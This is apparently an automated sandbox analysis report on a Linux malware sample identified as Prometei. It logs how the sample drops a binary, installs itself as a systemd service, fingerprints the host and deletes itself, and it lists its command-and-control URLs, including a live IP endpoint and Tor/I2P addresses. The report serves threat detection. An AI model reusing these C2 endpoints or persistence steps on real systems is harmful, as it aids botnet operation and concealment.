      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/232/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/232/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/1579/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/1579/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/112/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/112/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/233/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/233/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/1699/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/1699/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/113/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/113/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/234/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/234/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/1335/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/1335/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/1698/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/1698/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/114/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/114/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/235/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/235/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/1334/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/1334/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/1576/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/1576/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/2302/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/2302/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/115/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/115/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/236/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/236/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/116/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/116/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/237/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/237/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/117/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/117/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/118/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/118/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/910/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/910/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/119/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/119/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/912/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/912/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/10/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/10/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/2307/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/2307/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/11/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/11/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/918/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/918/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/12/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/12/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/13/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/13/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/14/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/14/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/15/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/15/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/16/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/16/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/17/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/17/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/18/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/18/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/1594/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/1594/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/120/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/120/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/121/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/121/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/1349/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/1349/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/1/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/1/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/122/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/122/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/243/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/243/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/123/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/123/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/2/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/2/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/124/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/124/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/3/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/3/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/4/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/4/cmdlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/125/statusJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)File opened: /proc/125/cmdlineJump to behavior
      Source: /tmp/na.elf (PID: 6204)Shell command executed: sh -c "pgrep na.elf"Jump to behavior
      Source: /tmp/na.elf (PID: 6208)Shell command executed: sh -c "pidof na.elf"Jump to behavior
      Source: /tmp/na.elf (PID: 6212)Shell command executed: sh -c "pgrep uplugplay"Jump to behavior
      Source: /tmp/na.elf (PID: 6218)Shell command executed: sh -c "pidof uplugplay"Jump to behavior
      Source: /tmp/na.elf (PID: 6222)Shell command executed: sh -c "pgrep upnpsetup"Jump to behavior
      Source: /tmp/na.elf (PID: 6226)Shell command executed: sh -c "pidof upnpsetup"Jump to behavior
      Source: /tmp/na.elf (PID: 6228)Shell command executed: sh -c "systemctl daemon-reload"Jump to behavior
      Source: /tmp/na.elf (PID: 6246)Shell command executed: sh -c "systemctl enable uplugplay.service"Jump to behavior
      Source: /tmp/na.elf (PID: 6251)Shell command executed: sh -c "systemctl start uplugplay.service"Jump to behavior
      Source: /usr/sbin/uplugplay (PID: 6255)Shell command executed: sh -c "/usr/sbin/uplugplay -Dcomsvc"Jump to behavior
      Source: /usr/sbin/uplugplay (PID: 6260)Shell command executed: sh -c hostnamectlJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6264)Shell command executed: sh -c hostnamectlJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6404)Shell command executed: sh -c "dmidecode --type baseboard"Jump to behavior
      Source: /usr/sbin/uplugplay (PID: 6408)Shell command executed: sh -c uptimeJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6414)Shell command executed: sh -c dmidecodeJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6418)Shell command executed: sh -c "uname -a"Jump to behavior
      Source: /usr/sbin/uplugplay (PID: 6422)Shell command executed: sh -c uptimeJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6426)Shell command executed: sh -c "uname -a"Jump to behavior
      Source: /bin/sh (PID: 6205)Pgrep executable: /usr/bin/pgrep -> pgrep na.elfJump to behavior
      Source: /bin/sh (PID: 6213)Pgrep executable: /usr/bin/pgrep -> pgrep uplugplayJump to behavior
      Source: /bin/sh (PID: 6223)Pgrep executable: /usr/bin/pgrep -> pgrep upnpsetupJump to behavior
      Source: /usr/bin/dash (PID: 6502)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.79LwtjX6wQ /tmp/tmp.udDZnLgcZV /tmp/tmp.DF8pyLiTt4Jump to behavior
      Source: /usr/bin/dash (PID: 6503)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.79LwtjX6wQ /tmp/tmp.udDZnLgcZV /tmp/tmp.DF8pyLiTt4Jump to behavior
      Source: /bin/sh (PID: 6229)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
      Source: /bin/sh (PID: 6247)Systemctl executable: /usr/bin/systemctl -> systemctl enable uplugplay.serviceJump to behavior
      Source: /bin/sh (PID: 6252)Systemctl executable: /usr/bin/systemctl -> systemctl start uplugplay.serviceJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6256)Reads from proc file: /proc/cpuinfoJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6256)Reads from proc file: /proc/statJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6256)Reads from proc file: /proc/meminfoJump to behavior
      Source: /tmp/na.elf (PID: 6201)File: /usr/sbin/uplugplay (bits: -v usr: x grp: x all: r)Jump to behavior
      Source: /tmp/na.elf (PID: 6201)File written: /usr/sbin/uplugplayJump to dropped file
      Source: submitted sampleStderr: Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.: exit code = 0

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: /tmp/na.elf (PID: 6201)File: /usr/sbin/uplugplayJump to dropped file
      Source: /bin/sh (PID: 6407)Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboardJump to behavior
      Source: /bin/sh (PID: 6415)Dmidecode executable: /usr/sbin/dmidecode dmidecodeJump to behavior
      Source: /tmp/na.elf (PID: 6201)File: /tmp/na.elfJump to behavior
      Source: na.elfSubmission file: segment LOAD with 7.6054 entropy (max. 8.0)
      Source: na.elfSubmission file: segment LOAD with 7.943 entropy (max. 8.0)
      Source: uplugplay.12.drDropped file: segment LOAD with 7.6054 entropy (max. 8.0)
      Source: uplugplay.12.drDropped file: segment LOAD with 7.943 entropy (max. 8.0)
      Source: /usr/sbin/uplugplay (PID: 6256)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
      Source: /usr/bin/pgrep (PID: 6205)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6213)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6223)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6256)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/uptime (PID: 6409)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/uptime (PID: 6423)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /tmp/na.elf (PID: 6201)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/sbin/uplugplay (PID: 6253)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/sbin/uplugplay (PID: 6256)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/uname (PID: 6419)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/uname (PID: 6427)Queries kernel information via 'uname': Jump to behavior
      Source: /lib/systemd/systemd-hostnamed (PID: 6266)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/gpg (PID: 6441)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/gpg (PID: 6443)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/gpg (PID: 6445)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/gpg (PID: 6447)Queries kernel information via 'uname': Jump to behavior

      Language, Device and Operating System Detection

      barindex
      Source: /bin/sh (PID: 6407)Dmidecode executable: /usr/sbin/dmidecode dmidecode --type baseboardJump to behavior
      Source: /bin/sh (PID: 6415)Dmidecode executable: /usr/sbin/dmidecode dmidecodeJump to behavior
      Source: /bin/sh (PID: 6419)Uname executable: /usr/bin/uname -> uname -aJump to behavior
      Source: /bin/sh (PID: 6427)Uname executable: /usr/bin/uname -> uname -aJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid AccountsWindows Management Instrumentation1
      Systemd Service
      1
      Systemd Service
      1
      Masquerading
      1
      OS Credential Dumping
      1
      Security Software Discovery
      Remote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Scripting
      Boot or Logon Initialization Scripts1
      File and Directory Permissions Modification
      LSASS Memory14
      System Information Discovery
      Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      Hidden Files and Directories
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Obfuscated Files or Information
      NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
      File Deletion
      LSA SecretsInternet Connection DiscoverySSHKeylogging1
      Proxy
      Scheduled TransferData Encrypted for Impact
      No configs have been found
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1652686 Sample: na.elf Startdate: 31/03/2025 Architecture: LINUX Score: 100 77 152.36.128.18, 58304, 58306, 80 NCRENUS United States 2->77 79 109.202.202.202, 80 INIT7CH Switzerland 2->79 81 5 other IPs or domains 2->81 83 Suricata IDS alerts for network traffic 2->83 85 Malicious sample detected (through community Yara rule) 2->85 87 Antivirus detection for dropped file 2->87 89 4 other signatures 2->89 11 na.elf 2->11         started        15 systemd uplugplay 2->15         started        17 systemd snapd-env-generator 2->17         started        19 9 other processes 2->19 signatures3 process4 file5 73 /usr/sbin/uplugplay, ELF 11->73 dropped 93 Found Tor onion address 11->93 95 Drops files in suspicious directories 11->95 97 Sample deletes itself 11->97 21 na.elf sh 11->21         started        23 na.elf sh 11->23         started        25 na.elf sh 11->25         started        29 6 other processes 11->29 27 uplugplay 15->27         started        signatures6 process7 process8 31 sh pgrep 21->31         started        33 sh pidof 23->33         started        35 sh pgrep 25->35         started        37 uplugplay sh 27->37         started        39 sh pidof 29->39         started        41 sh pgrep 29->41         started        43 sh pidof 29->43         started        45 3 other processes 29->45 process9 47 sh uplugplay 37->47         started        file10 75 /etc/CommId, ASCII 47->75 dropped 50 uplugplay sh 47->50         started        52 uplugplay sh 47->52         started        54 uplugplay sh 47->54         started        56 5 other processes 47->56 process11 process12 58 sh dmidecode 50->58         started        61 sh dmidecode 52->61         started        63 sh hostnamectl 54->63         started        65 sh hostnamectl 56->65         started        67 sh uptime 56->67         started        69 sh uname 56->69         started        71 2 other processes 56->71 signatures13 91 Executes the "dmidecode" command for reading DMI BIOS info like hardware or serial numbers (indicative of machine fingerprinting or VM-detection) 58->91
      SourceDetectionScannerLabelLink
      na.elf37%VirustotalBrowse
      na.elf47%ReversingLabsLinux.Trojan.Generic
      na.elf100%AviraLINUX/GM.Agent.JQ
      SourceDetectionScannerLabelLink
      /usr/sbin/uplugplay100%AviraLINUX/GM.Agent.JQ
      /usr/sbin/uplugplay47%ReversingLabsLinux.Trojan.Generic
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://152.36.128.18/cgi-bin/p.cgi?r=15&i=8458VTJT921KQOYZ100%Avira URL Cloudmalware

      Download Network PCAP: filteredfull

      NameIPActiveMaliciousAntivirus DetectionReputation
      xinchaodbcfda.com
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        http://152.36.128.18/cgi-bin/p.cgi?r=15&i=8458VTJT921KQOYZtrue
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onina.elf, 6201.1.000000000052d000.0000000001575000.rw-.sdmpfalse
          high
          http://upx.sf.netna.elf, uplugplay.12.drfalse
            high
            http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgina.elf, 6201.1.000000000052d000.0000000001575000.rw-.sdmpfalse
              high
              https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgina.elf, 6201.1.000000000052d000.0000000001575000.rw-.sdmpfalse
                high
                http://152.36.128.18/cgi-bin/p.cgina.elf, 6201.1.000000000052d000.0000000001575000.rw-.sdmpfalse
                  high
                  http://dummy.zero/cgi-bin/prometei.cgina.elf, 6201.1.000000000052d000.0000000001575000.rw-.sdmpfalse
                    high
                    http://152.36.128na.elf, uplugplay.12.drfalse
                      high
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      34.249.145.219
                      unknownUnited States
                      16509AMAZON-02USfalse
                      199.232.90.49
                      unknownUnited States
                      54113FASTLYUSfalse
                      152.36.128.18
                      unknownUnited States
                      81NCRENUStrue
                      109.202.202.202
                      unknownSwitzerland
                      13030INIT7CHfalse
                      91.189.91.43
                      unknownUnited Kingdom
                      41231CANONICAL-ASGBfalse
                      91.189.91.42
                      unknownUnited Kingdom
                      41231CANONICAL-ASGBfalse
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      34.249.145.219na.elfGet hashmaliciousPrometeiBrowse
                        boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                          na.elfGet hashmaliciousPrometeiBrowse
                            Execution.i686.elfGet hashmaliciousGafgyt, MiraiBrowse
                              Execution.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                na.elfGet hashmaliciousPrometeiBrowse
                                  miori.x86.elfGet hashmaliciousUnknownBrowse
                                    na.elfGet hashmaliciousPrometeiBrowse
                                      na.elfGet hashmaliciousPrometeiBrowse
                                        na.elfGet hashmaliciousPrometeiBrowse
                                          199.232.90.49na.elfGet hashmaliciousPrometeiBrowse
                                            l7vmra.elfGet hashmaliciousUnknownBrowse
                                              na.elfGet hashmaliciousPrometeiBrowse
                                                na.elfGet hashmaliciousPrometeiBrowse
                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                      miori.arm7.elfGet hashmaliciousUnknownBrowse
                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                          miori.arm5.elfGet hashmaliciousUnknownBrowse
                                                            Mozi.a.elfGet hashmaliciousUnknownBrowse
                                                              152.36.128.18na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18/cgi-bin/p.cgi?r=16&i=HG6TD1RQ3I303VPA
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18/cgi-bin/p.cgi?r=13&i=UPM6985GQ620630A
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18/cgi-bin/p.cgi?r=22&i=162XYDVI8U344LH4
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18/cgi-bin/p.cgi?r=13&i=8711V51Q45KM5B9L
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18/cgi-bin/p.cgi?r=4&i=213U6SANKFY6LBV1
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18/cgi-bin/p.cgi?r=31&i=8LCN4KQ5FG8UGTSN
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18/cgi-bin/p.cgi?r=7&i=02ZQF59YO97QSN16
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18/cgi-bin/p.cgi?r=18&i=3590ZZ6L7CIM03B1
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18/cgi-bin/p.cgi?r=13&i=080ZX3RN6S3YO8YV
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18/cgi-bin/p.cgi?r=24&i=ITO34I304D6614V4
                                                              109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                                              • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                                              No context
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              CANONICAL-ASGBna.elfGet hashmaliciousPrometeiBrowse
                                                              • 91.189.91.42
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 91.189.91.42
                                                              Mozi.m.elfGet hashmaliciousUnknownBrowse
                                                              • 91.189.91.42
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 91.189.91.42
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 91.189.91.42
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 185.125.190.26
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 91.189.91.42
                                                              boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                              • 91.189.91.42
                                                              boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                              • 185.125.190.26
                                                              boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                                              • 91.189.91.42
                                                              INIT7CHna.elfGet hashmaliciousPrometeiBrowse
                                                              • 109.202.202.202
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 109.202.202.202
                                                              Mozi.m.elfGet hashmaliciousUnknownBrowse
                                                              • 109.202.202.202
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 109.202.202.202
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 109.202.202.202
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 109.202.202.202
                                                              boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              boatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                              • 109.202.202.202
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 109.202.202.202
                                                              FASTLYUSna.elfGet hashmaliciousPrometeiBrowse
                                                              • 199.232.90.49
                                                              l7vmra.elfGet hashmaliciousUnknownBrowse
                                                              • 199.232.90.49
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 199.232.90.49
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 199.232.90.49
                                                              http://APP.ITGet hashmaliciousUnknownBrowse
                                                              • 199.232.89.229
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 199.232.90.49
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 199.232.38.49
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 199.232.38.49
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 199.232.90.49
                                                              https://get-razzed.online/krcGet hashmaliciousHTMLPhisherBrowse
                                                              • 151.101.130.137
                                                              AMAZON-02USna.elfGet hashmaliciousPrometeiBrowse
                                                              • 52.26.80.133
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 52.26.80.133
                                                              Presentation Of Court Order_Letter.pptxGet hashmaliciousHTMLPhisherBrowse
                                                              • 35.182.220.38
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 54.171.230.55
                                                              Mozi.m.elfGet hashmaliciousUnknownBrowse
                                                              • 54.171.230.55
                                                              https://www.canva.com/design/DAGjR3xjHjQ/Jz3hsdYd1wfGuO7V0r6_Zw/view?utm_content=DAGjR3xjHjQ&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=h5790724d57Get hashmaliciousUnknownBrowse
                                                              • 18.238.4.43
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 54.171.230.55
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 34.243.160.129
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 54.171.230.55
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 34.249.145.219
                                                              NCRENUSna.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18
                                                              na.elfGet hashmaliciousPrometeiBrowse
                                                              • 152.36.128.18
                                                              No context
                                                              No context
                                                              Process:/usr/sbin/uplugplay
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):16
                                                              Entropy (8bit):3.75
                                                              Encrypted:false
                                                              SSDEEP:3:cdzpaX6:cdAX6
                                                              MD5:B92E049C06BE063CECECC14F99D2D35A
                                                              SHA1:A5A842A33EA18C94249C3FB56C5C03A2FA992069
                                                              SHA-256:420A4CAB2F87DC9D794C6E0453C198A7920F91823C391FB651F4BBDCDAFBDC26
                                                              SHA-512:3F00A36C9291A1306989D9C3B80335ECA0EACF8006F473697DC19F07A1B28DE2B90E1FC7600A2C2C715A0B9D4F81CAE97F71F790DE44714B962564629D4DEBCB
                                                              Malicious:true
                                                              Reputation:low
                                                              Preview:8458VTJT921KQOYZ
                                                              Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):76
                                                              Entropy (8bit):3.7627880354948586
                                                              Encrypted:false
                                                              SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                              MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                              SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                              SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                              SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                              Malicious:false
                                                              Reputation:high, very likely benign file
                                                              Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                              Process:/tmp/na.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):145
